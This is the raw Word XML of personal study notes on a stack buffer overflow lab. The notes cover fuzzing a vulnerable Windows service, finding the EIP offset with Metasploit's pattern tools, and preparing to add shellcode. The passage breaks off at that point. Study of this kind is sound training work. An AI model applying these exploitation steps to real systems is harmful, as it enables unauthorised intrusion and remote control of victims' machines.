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AC884" w14:textId="440B54E2" w:rsidR="004C2223" w:rsidRDefault="004C2223" w:rsidP="007251B3">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="01C42F48" w14:textId="01D713BE" w:rsidR="004C2223" w:rsidRPr="000E6958" w:rsidRDefault="004C2223" w:rsidP="000E6958">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E6958">
        <w:rPr>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>INTRODUCTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F04423" w14:textId="77777777" w:rsidR="007251B3" w:rsidRDefault="007251B3" w:rsidP="007251B3"/>
    <w:p w14:paraId="3A72BFE4" w14:textId="77777777" w:rsidR="007251B3" w:rsidRDefault="007251B3" w:rsidP="007251B3">
      <w:r>
        <w:t>Anatomy of Memory:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F386B1D" w14:textId="77777777" w:rsidR="007251B3" w:rsidRDefault="007251B3" w:rsidP="007251B3">
      <w:r>
        <w:t>Kernel 11111 (TOP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127216D9" w14:textId="77777777" w:rsidR="007251B3" w:rsidRDefault="007251B3" w:rsidP="007251B3">
      <w:r>
        <w:t xml:space="preserve">Stack </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> focus on stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE3381B" w14:textId="77777777" w:rsidR="007251B3" w:rsidRDefault="007251B3" w:rsidP="007251B3">
      <w:r>
        <w:t>Heap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EC4344" w14:textId="77777777" w:rsidR="007251B3" w:rsidRDefault="007251B3" w:rsidP="007251B3">
      <w:r>
        <w:t>Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DD7148" w14:textId="77777777" w:rsidR="007251B3" w:rsidRDefault="007251B3" w:rsidP="007251B3">
      <w:r>
        <w:t>Text 00000 (BOTTOM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CAE4124" w14:textId="77777777" w:rsidR="007251B3" w:rsidRDefault="007251B3" w:rsidP="007251B3"/>
    <w:p w14:paraId="3405C211" w14:textId="77777777" w:rsidR="007251B3" w:rsidRDefault="007251B3" w:rsidP="007251B3">
      <w:r>
        <w:t>Anatomy of Stack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF2E4A9" w14:textId="77777777" w:rsidR="007251B3" w:rsidRDefault="007251B3" w:rsidP="007251B3"/>
    <w:p w14:paraId="103B031C" w14:textId="77777777" w:rsidR="007251B3" w:rsidRPr="00574142" w:rsidRDefault="007251B3" w:rsidP="007251B3">
      <w:r w:rsidRPr="00574142">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00574142">
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "https://i1.wp.com/tcm-sec.com/wp-content/uploads/2019/05/1.png?w=1080&amp;ssl=1" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00574142">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00574142">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A8DF76C" wp14:editId="1359DE14">
            <wp:extent cx="5943600" cy="2163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63445"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00574142">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F3093C" w14:textId="77777777" w:rsidR="007251B3" w:rsidRDefault="007251B3" w:rsidP="007251B3"/>
    <w:p w14:paraId="00B62841" w14:textId="77777777" w:rsidR="007251B3" w:rsidRDefault="007251B3" w:rsidP="007251B3">
      <w:r>
        <w:t xml:space="preserve">Buffer space goes down, you send a bunch of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>space</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> but you should reach the EBP but stop, if you have a BO attack then you overflow the buffer space you’re using and reach over the EBP and reach into the EIP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6732F6D7" w14:textId="77777777" w:rsidR="007251B3" w:rsidRDefault="007251B3" w:rsidP="007251B3">
      <w:r>
        <w:t>We can use this address to point to directions that we instruction (malicious code that gives us a reverse shell).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29347CE9" w14:textId="77777777" w:rsidR="007251B3" w:rsidRDefault="007251B3" w:rsidP="007251B3"/>
    <w:p w14:paraId="5DA8BDAD" w14:textId="77777777" w:rsidR="007251B3" w:rsidRDefault="007251B3" w:rsidP="007251B3">
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "https://i2.wp.com/tcm-sec.com/wp-content/uploads/2019/05/3.jpg?w=1080&amp;ssl=1" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79A951B2" wp14:editId="6FB00ED9">
            <wp:extent cx="3673784" cy="13372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5603" cy="1348824"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D81772E" w14:textId="77777777" w:rsidR="007251B3" w:rsidRDefault="007251B3" w:rsidP="007251B3"/>
    <w:p w14:paraId="5AC5F7AD" w14:textId="77777777" w:rsidR="007251B3" w:rsidRDefault="007251B3" w:rsidP="007251B3">
      <w:r w:rsidRPr="00A455A0">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Steps to conduct a Buffer Overflow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D53E50" w14:textId="77777777" w:rsidR="007251B3" w:rsidRDefault="007251B3" w:rsidP="007251B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Fuzzing – Send a bunch of characters at a program and see if we can break it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC46E49" w14:textId="77777777" w:rsidR="007251B3" w:rsidRDefault="007251B3" w:rsidP="007251B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Finding the Offset – If we do break it, we want to find out at what point we broke it, called the “offset”, use the offset to overwrite the EIP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC7BDA9" w14:textId="77777777" w:rsidR="007251B3" w:rsidRDefault="007251B3" w:rsidP="007251B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Overwriting the EIP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C3DFC0" w14:textId="77777777" w:rsidR="007251B3" w:rsidRDefault="007251B3" w:rsidP="007251B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Once we have the EIP controlled we need to do house cleanup things.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6B9D32" w14:textId="77777777" w:rsidR="007251B3" w:rsidRDefault="007251B3" w:rsidP="007251B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Finding bad characters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7A55D6" w14:textId="77777777" w:rsidR="007251B3" w:rsidRDefault="007251B3" w:rsidP="007251B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Finding the right module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663BE84D" w14:textId="77777777" w:rsidR="007251B3" w:rsidRDefault="007251B3" w:rsidP="007251B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Generating shellcode </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> point that EIP to our malicious shellcode.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234BD207" w14:textId="77777777" w:rsidR="007251B3" w:rsidRDefault="007251B3" w:rsidP="007251B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Root!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC51A48" w14:textId="77777777" w:rsidR="007251B3" w:rsidRDefault="007251B3" w:rsidP="007251B3">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77D5C3FA" w14:textId="5705F634" w:rsidR="0026162D" w:rsidRDefault="004C2223">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>Tools to be used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC31B4F" w14:textId="5D6EA3D6" w:rsidR="004C2223" w:rsidRDefault="004C2223" w:rsidP="00CC7E81">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>Victim machine: Windows box.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F57B279" w14:textId="3CBB31C1" w:rsidR="004C2223" w:rsidRDefault="004C2223" w:rsidP="00CC7E81">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>Vulnerable Software: running on Windows, what will need to attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E45F1DA" w14:textId="6A517645" w:rsidR="004C2223" w:rsidRDefault="004C2223" w:rsidP="00CC7E81">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>Attacker Machine: Kali Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D0524B" w14:textId="70B023B4" w:rsidR="004C2223" w:rsidRDefault="00CC7E81" w:rsidP="00CC7E81">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>On the victim machine: Run Debugger: Immunity Debugger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D904F8" w14:textId="61A06726" w:rsidR="004D7B3B" w:rsidRDefault="004D7B3B"/>
    <w:p w14:paraId="61A1FA77" w14:textId="1E128305" w:rsidR="004D7B3B" w:rsidRDefault="004D7B3B"/>
    <w:p w14:paraId="7715DCA7" w14:textId="1977FBF3" w:rsidR="000679D6" w:rsidRPr="000679D6" w:rsidRDefault="004D7B3B" w:rsidP="000679D6">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>FUZZING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C34150" w14:textId="77777777" w:rsidR="0063584C" w:rsidRDefault="003A328D" w:rsidP="003A328D">
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "https://i1.wp.com/tcm-sec.com/wp-content/uploads/2019/05/5.png?w=1080&amp;ssl=1" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FE1BFC5" wp14:editId="5286ABFE">
            <wp:extent cx="5943600" cy="3185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r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="0063584C">
        <w:t>Declare it’s python, import modules, import sleep, so sleep for a second before trying this process again.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25702E34" w14:textId="77777777" w:rsidR="0063584C" w:rsidRDefault="0063584C" w:rsidP="003A328D"/>
    <w:p w14:paraId="2D077D84" w14:textId="77777777" w:rsidR="0063584C" w:rsidRDefault="0063584C" w:rsidP="003A328D">
      <w:r>
        <w:t xml:space="preserve">Declare buffer variable </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> inside buffer we have 100 A’s, we’re going to say while true (loop) </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> try to connect to this socket (connect to IP address, then port)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B570BA" w14:textId="77777777" w:rsidR="0063584C" w:rsidRDefault="0063584C" w:rsidP="003A328D">
      <w:r>
        <w:t xml:space="preserve">Then we will send the command that’s vulnerable. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>s.send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ( xxx + buffer). Close that connection, go to sleep for a second, then append to buffer for another 100 A’s/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C357B6A" w14:textId="77777777" w:rsidR="0063584C" w:rsidRDefault="0063584C" w:rsidP="003A328D">
      <w:r>
        <w:t>As long as there’s a connection, we’re going to keep sending you buffers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698AB818" w14:textId="77777777" w:rsidR="0063584C" w:rsidRDefault="0063584C" w:rsidP="003A328D">
      <w:r>
        <w:t>We’re trying to narrow down where it’s breaking. Once it breaks print an exception.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1E3804" w14:textId="77777777" w:rsidR="0063584C" w:rsidRDefault="0063584C" w:rsidP="003A328D">
      <w:r>
        <w:t xml:space="preserve">“Fuzzing crashed at 2700 bytes” </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748A4529" w14:textId="7A5C5F95" w:rsidR="0063584C" w:rsidRDefault="0063584C" w:rsidP="003A328D"/>
    <w:p w14:paraId="44CBE0EC" w14:textId="5C809912" w:rsidR="00EC7C15" w:rsidRDefault="00EC7C15" w:rsidP="003A328D"/>
    <w:p w14:paraId="4C7D317D" w14:textId="79E05C1A" w:rsidR="00EC7C15" w:rsidRDefault="00EC7C15" w:rsidP="003A328D"/>
    <w:p w14:paraId="2F3A4D87" w14:textId="6ABD0616" w:rsidR="00EC7C15" w:rsidRDefault="00EC7C15" w:rsidP="003A328D"/>
    <w:p w14:paraId="709F7638" w14:textId="308748B1" w:rsidR="00EC7C15" w:rsidRDefault="00EC7C15" w:rsidP="003A328D"/>
    <w:p w14:paraId="50FC7C00" w14:textId="012DF3B4" w:rsidR="00EC7C15" w:rsidRDefault="00EC7C15" w:rsidP="003A328D"/>
    <w:p w14:paraId="5AEB02DA" w14:textId="04D94376" w:rsidR="00EC7C15" w:rsidRDefault="00EC7C15" w:rsidP="003A328D"/>
    <w:p w14:paraId="1DFDB1C7" w14:textId="0002628F" w:rsidR="00EC7C15" w:rsidRDefault="00EC7C15" w:rsidP="003A328D"/>
    <w:p w14:paraId="09DFE500" w14:textId="77777777" w:rsidR="00E31133" w:rsidRDefault="00E31133" w:rsidP="003A328D"/>
    <w:p w14:paraId="2CBA341C" w14:textId="7E6DCEE4" w:rsidR="00E31133" w:rsidRDefault="00E31133" w:rsidP="003A328D"/>
    <w:p w14:paraId="55A6EDEC" w14:textId="77777777" w:rsidR="00E31133" w:rsidRDefault="00E31133" w:rsidP="003A328D"/>
    <w:p w14:paraId="47391DD9" w14:textId="14784ADE" w:rsidR="004D7B3B" w:rsidRDefault="0063584C">
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B702AA4" w14:textId="01E2C077" w:rsidR="0063584C" w:rsidRPr="000679D6" w:rsidRDefault="0063584C" w:rsidP="0063584C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>FINDING THE OFFSET (EIP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A145EA8" w14:textId="77777777" w:rsidR="00EC7C15" w:rsidRDefault="00EC7C15" w:rsidP="00EC7C15">
      <w:r>
        <w:t xml:space="preserve">Finding where the EIP is at is the next step. Tool that will create values that we’ll send out then we’ll say what is the EIP value and where does it correspond in the specific number of bytes that we sent over. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DCDDF2" w14:textId="45406CCC" w:rsidR="0063584C" w:rsidRDefault="0063584C"/>
    <w:p w14:paraId="539A9E35" w14:textId="43CF5807" w:rsidR="00EC7C15" w:rsidRDefault="00EC7C15">
      <w:r>
        <w:t>-l length = we found somewhere around 2700 bytes is where the vuln crashed, let’s just make it an even 3000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0470D253" w14:textId="77777777" w:rsidR="00EC7C15" w:rsidRDefault="00EC7C15"/>
    <w:p w14:paraId="4C4778E7" w14:textId="77415C18" w:rsidR="00EC7C15" w:rsidRDefault="00EC7C15">
      <w:r>
        <w:t>/usr/share/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-framework/tools/exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pattern_create.rb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -l 3000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2176E96D" w14:textId="77777777" w:rsidR="00EC7C15" w:rsidRDefault="00EC7C15"/>
    <w:p w14:paraId="32C14403" w14:textId="7253464C" w:rsidR="00EC7C15" w:rsidRDefault="00EC7C15">
      <w:r>
        <w:t>Now it will generate 3000 bytes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBCB9C2" w14:textId="6DF432EC" w:rsidR="00FB1D2C" w:rsidRDefault="00FB1D2C">
      <w:r>
        <w:t xml:space="preserve">Modify script we created earlier: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5274AE" w14:textId="555091F9" w:rsidR="00B02966" w:rsidRDefault="00B02966">
      <w:r>
        <w:t xml:space="preserve">2.py </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46831A59" w14:textId="5D1E5A34" w:rsidR="00FB1D2C" w:rsidRDefault="00FB1D2C">
      <w:r>
        <w:t xml:space="preserve">offset = </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC9C920" w14:textId="6668A70D" w:rsidR="00FB1D2C" w:rsidRDefault="00FB1D2C" w:rsidP="00FB1D2C">
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "https://i2.wp.com/tcm-sec.com/wp-content/uploads/2019/05/10.png?w=1080&amp;ssl=1" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53F8044C" wp14:editId="525A1F1E">
            <wp:extent cx="5943600" cy="2150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0745"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBD4365" w14:textId="1508A401" w:rsidR="00EC7C15" w:rsidRDefault="00455EC0">
      <w:r>
        <w:t>We don’t need a while loop, try: is enough, same connection, send offset.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B70FBB" w14:textId="77777777" w:rsidR="008B77CC" w:rsidRDefault="008B77CC"/>
    <w:p w14:paraId="0D7BB55D" w14:textId="711B516C" w:rsidR="00670BD8" w:rsidRDefault="008B77CC">
      <w:r>
        <w:t xml:space="preserve">Run script </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Going back to Immunity Debugger, we see that we’ve overwritten everything, we see the EIP is </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400F9698" w14:textId="3C365E65" w:rsidR="008B77CC" w:rsidRDefault="00A74E9F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77C31C8B" wp14:editId="7492BBAA">
            <wp:extent cx="16002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04 at 5.27.42 PM.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1600200" cy="381000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD0296D" w14:textId="28D2012F" w:rsidR="00A74E9F" w:rsidRDefault="00A74E9F"/>
    <w:p w14:paraId="1B841F99" w14:textId="67B05814" w:rsidR="00A74E9F" w:rsidRDefault="00A74E9F">
      <w:r>
        <w:t>Go back to kali, and run:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732FD7EC" w14:textId="5B100457" w:rsidR="00A74E9F" w:rsidRDefault="00A74E9F">
      <w:r>
        <w:t>Q = finding, EIP number.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADDCB73" w14:textId="363BA4D7" w:rsidR="00A74E9F" w:rsidRDefault="00A74E9F" w:rsidP="00A74E9F">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>/usr/share/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-framework/tools/exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pattern_offset.rb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -l 3000 -q 386F4337</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292F8D25" w14:textId="1CC9E2B6" w:rsidR="00A74E9F" w:rsidRDefault="00A74E9F" w:rsidP="00A74E9F"/>
    <w:p w14:paraId="080B328B" w14:textId="5F7F0F93" w:rsidR="00995333" w:rsidRDefault="00995333" w:rsidP="00A74E9F">
      <w:r>
        <w:t>We will find a pattern offset, “Exact match at offset 2003”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288558BD" w14:textId="77777777" w:rsidR="00995333" w:rsidRDefault="00995333" w:rsidP="00A74E9F"/>
    <w:p w14:paraId="54840E87" w14:textId="577103B7" w:rsidR="008A6A4C" w:rsidRDefault="008A6A4C">
      <w:r>
        <w:t xml:space="preserve">This tells us that at 2003 bytes, we can control the EIP. Overwrite it with very specific bytes and see if they show up. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A861F8" w14:textId="47C31C71" w:rsidR="008A6A4C" w:rsidRDefault="008A6A4C"/>
    <w:p w14:paraId="2327017B" w14:textId="77777777" w:rsidR="008A6A4C" w:rsidRDefault="008A6A4C"/>
    <w:p w14:paraId="0A6D3534" w14:textId="355B5363" w:rsidR="008A6A4C" w:rsidRDefault="008A6A4C"/>
    <w:p w14:paraId="18525BF8" w14:textId="7B3C9F61" w:rsidR="008A6A4C" w:rsidRDefault="008A6A4C" w:rsidP="008A6A4C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>OVERWRITING THE EIP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBB48D8" w14:textId="77777777" w:rsidR="008A6A4C" w:rsidRPr="000679D6" w:rsidRDefault="008A6A4C" w:rsidP="008A6A4C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57BB83D6" w14:textId="0FBF2ACD" w:rsidR="008A6A4C" w:rsidRDefault="008A6A4C">
      <w:r>
        <w:t>We found the offset at 2003 bytes, so 2003 bytes right before you get to the EIP, then the EIP itself is 4 bytes long – so overwrite those specific bytes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D9BFDC" w14:textId="43A22D0B" w:rsidR="00C05DB0" w:rsidRDefault="00C05DB0"/>
    <w:p w14:paraId="2C8A1434" w14:textId="4835D83F" w:rsidR="00842DCF" w:rsidRDefault="00C05DB0">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> delete the offset variable and add shellcode:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727D6E81" w14:textId="114C4813" w:rsidR="00652D80" w:rsidRDefault="00652D80">
      <w:r>
        <w:t xml:space="preserve">Remember, we found 2003 from the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
